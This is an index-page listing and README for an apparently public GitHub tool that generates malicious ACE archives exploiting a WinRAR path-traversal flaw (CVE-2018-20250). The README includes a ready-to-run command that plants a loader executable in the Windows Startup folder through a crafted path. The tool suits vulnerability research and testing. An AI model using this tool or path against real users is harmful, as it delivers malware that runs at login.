Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/manulqwerty/Evil-WinRAR-Gen
Generator of malicious Ace files for WinRAR < 5.70 beta 1
https://github.com/manulqwerty/Evil-WinRAR-Gen
Last synced: 21 days ago
JSON representation
Generator of malicious Ace files for WinRAR < 5.70 beta 1
- Host: GitHub
- URL: https://github.com/manulqwerty/Evil-WinRAR-Gen
- Owner: manulqwerty
- License: gpl-3.0
- Created: 2019-02-26T17:51:29.000Z (almost 6 years ago)
- Default Branch: master
- Last Pushed: 2019-07-26T18:17:29.000Z (over 5 years ago)
- Last Synced: 2024-08-05T17:40:07.486Z (4 months ago)
- Language: Python
- Size: 21.5 KB
- Stars: 124
- Watchers: 3
- Forks: 28
- Open Issues: 4
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - manulqwerty/Evil-WinRAR-Gen - Generator of malicious Ace files for WinRAR < 5.70 beta 1 (Python)
README
# Evil-WinRAR-Generator
[![Python 3.6](https://img.shields.io/badge/python-3.6-yellow.svg)](https://www.python.org/downloads/release/python-360/)
[![License: GPL v3](https://img.shields.io/badge/License-GPL%20v3-blue.svg)](https://raw.githubusercontent.com/master/LICENSE) [![Twitter](https://img.shields.io/badge/[email protected])](https://twitter.com/manulqwerty)Generator of malicious Ace files for WinRAR < 5.70 beta 1
Vulnerability by [research.checkpoint.com](https://research.checkpoint.com/extracting-code-execution-from-winrar/)
**Developed by [@manulqwerty - IronHackers](https://ironhackers.es).**
Usage
----
Help:`./evilWinRAR.py -h`
Generate a malicius archive:
> Rar filename: evil.rar> Evil path: C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
> Evil files: calc.exe , l04d3r.exe
> Good files: hello.txt , cats.jpeg
```bash
./evilWinRAR.py -o evil.rar -e calc.exe l04d3r.exe -g hello.txt cats.jpeg -p 'C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\'
```Instalation
----
You can download Evil-WinRAR-Generator by cloning the [Git](https://github.com/manulqwerty/Evil-WinRAR-Gen.git) repository:
```bash
git clone https://github.com/manulqwerty/Evil-WinRAR-Gen.git
cd Evil-WinRAR-Gen && pip3 install -r requirements.txt
chmod +x evilWinRAR.py
```
Evil-WinRAR-Generator works out of the box with [Python](http://www.python.org/download/) version **3.x** on any platform.Proof of Concept (CVE-2018-20250)
----
[![IMAGE ALT TEXT HERE](https://img.youtube.com/vi/eUsVHa_fxrA/0.jpg)](https://www.youtube.com/watch?v=eUsVHa_fxrA)Screenshots
----
![Screenshot](https://ironhackers.es/wp-content/uploads/2019/02/2-4.png)
![Screenshot](https://ironhackers.es/wp-content/uploads/2019/02/1-4.png)Credits
----
https://github.com/droe/acefilehttps://github.com/WyAtu/CVE-2018-20250
**Colaborators:**
[cybervaca]
[cybervaca]: https://github.com/cybervaca